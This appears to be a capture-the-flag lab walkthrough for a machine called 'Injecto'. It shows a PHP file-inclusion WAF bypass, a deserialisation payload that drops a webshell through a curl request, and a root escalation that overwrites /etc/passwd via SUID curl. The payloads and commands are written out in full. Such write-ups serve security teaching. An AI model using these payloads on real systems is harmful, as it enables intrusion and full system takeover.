Injecto

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 192.168.183.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-11 23:05 +08
Nmap scan report for 192.168.183.173
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Web Enum -> PHP LFI

Port 80 shows a simple quiz application:

If we click any of the buttons, we are shown a very obvious LFI.

Attempting to do anything with it results in being blocked by a WAF.

We can confirm that the website runs on PHP by visiting index.php and being shown the same page. Then, I experimented with some PHP Filter LFI exploits for the blackdeath page.

The WAF is easily bypassed as long as we include it within the page parameter. We can read the code of index.php by visiting:

http://192.168.183.173/index.php?page=php://filter/convert.base64-encode/resource=blackdeath/../../../../../var/www/html/index

Here's the PHP code:

<?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
                $extension = '.php';
            if(isset($_GET['page'])) {
                if(containsStr($_GET['page'], 'blackdeath') || containsStr($_GET['page'], 'coronavirus')) {
                    include $_GET['page'] . $extension;
                } else {
                    echo 'Tampering Detected!';
                }
            }
?>

Source Code Review -> Deserialisation

We can read the index.php file of the nginx configuration here:

http://192.168.183.173/index.php?page=php://filter/convert.base64-encode/resource=blackdeath/../../../../../../usr/share/nginx/html/index

Here's the PHP code:

<?php
            class MyClass {
            
            public $form_file = 'msgwithres.txt';
            public $msgo = '';
            
            public function Savemsgo() {
            
            $researcher_name = $_GET['name']; 
            $researcher_email = $_GET['email'];
            $respo = $_GET['comments'];
            
                $this-> msgo = "msgo: " . $researcher_name . " || Email : " . $researcher_email . " || Comment: " . $respo . "\n";
            
            }
            public function __destruct() { 
            file_put_contents(__DIR__ . '/' . $this->form_file,$this->msgo,FILE_APPEND);
            echo 'Saved! :)';
            }
            }
            $values_submit = $_GET['values_submit'] ?? '';
            $msgovalues_submit = unserialize($values_submit);
            
            $webApp = new MyClass;
            $webApp -> Savemsgo();
?>

This PHP runs for the service on port 8080. The vulnerability here is the fact that the website deserialises the output we generate.

We can then submit a GET requests with this payload:

O:7:"MyClass":2:{s:9:"form_file";s:8:"test.php";s:4:"msgo";s:29:"<?php+system($_GET['cmd']);?>";}

This would output a webshell on the machine for us to execute commands from. To submit it, we can just use this curl command:

$ curl "http://192.168.183.173:8080/index.php?values_submit=O:7:%22MyClass%22:2:%7Bs:9:%22form_file%22;s:8:%22test.php%22;s:4:%22msgo%22;s:29:%22%3C?php+system(\$_GET%5B'cmd'%5D);?%3E%22;%7D"

Then, we can verify that we have RCE:

Getting reverse shell using the usual bash one-liner is easy:

Privilege Escalation

Curl SUID -> Overwrite /etc/passwd

I searched for SUID binaries, and found that curl was one of them:

www-data@injectocurly:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/curl

This means we can overwrite any file. To get a root shell, we can overwrite the /etc/passwd file. First, generate a valid hash:

$ openssl passwd -1 hello   
$1$wsCz0GNf$0S8e55RreE.iCJIyEr3jP.

Afterwards, just copy the /etc/passwd file and append this line:

hacker:$1$wsCz0GNf$0S8e55RreE.iCJIyEr3jP.:0:0::/root:/bin/sh

Then, host the new passwd file on a HTTP server and curl it, directing the output to /etc/passwd. Afterwards, su to the new user to get root:

Rooted!